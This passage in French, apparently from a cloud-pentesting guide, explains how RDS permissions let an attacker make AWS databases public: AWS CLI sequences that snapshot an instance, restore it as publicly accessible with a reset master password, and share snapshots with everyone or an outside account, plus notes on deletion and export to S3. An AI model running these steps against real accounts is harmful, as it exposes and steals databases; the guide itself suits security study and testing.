Si l'attaquant dispose des autorisations nécessaires, il pourrait rendre une base de données publiquement accessible en créant un instantané de la base de données, puis une base de données publiquement accessible à partir de l'instantané.
awsrdsdescribe-db-instances# Get DB identifierawsrdscreate-db-snapshot \--db-instance-identifier <db-id> \--db-snapshot-identifier cloudgoat# Get subnet groups & security groupsawsrdsdescribe-db-subnet-groupsawsec2describe-security-groupsawsrdsrestore-db-instance-from-db-snapshot \--db-instance-identifier "new-db-not-malicious" \--db-snapshot-identifier <scapshotId> \--db-subnet-group-name <dbsubnetgroup> \--publicly-accessible \--vpc-security-group-ids <ec2-securitygroup>awsrdsmodify-db-instance \--db-instance-identifier "new-db-not-malicious" \--master-user-password 'Llaody2f6.123' \--apply-immediately# Connect to the new DB after a few mins
Un attaquant avec ces autorisations pourrait créer un instantané d'une base de données et le rendre publiquementdisponible. Ensuite, il pourrait simplement créer dans son propre compte une base de données à partir de cet instantané.
Si l'attaquant n'a pas le rds:CreateDBSnapshot, il pourrait quand même rendre d'autres instantanés créés publics.
# create snapshotawsrdscreate-db-snapshot--db-instance-identifier<db-instance-identifier>--db-snapshot-identifier<snapshot-name># Make it public/share with attackers accountaws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all
## Specify account IDs instead of "all" to give access only to a specific account: --values-to-add {"111122223333","444455556666"}
Impact potentiel : Accès à des informations sensibles ou actions non autorisées en utilisant des identifiants divulgués.
rds:DeleteDBInstance
Un attaquant avec ces autorisations peut faire du déni de service sur des instances RDS existantes.
Impact potentiel: Suppression des instances RDS existantes et perte potentielle de données.
rds:StartExportTask
À faire : Test
Un attaquant avec cette autorisation peut exporter un instantané d'instance RDS vers un compartiment S3. Si l'attaquant contrôle le compartiment S3 de destination, il peut potentiellement accéder à des données sensibles dans l'instantané exporté.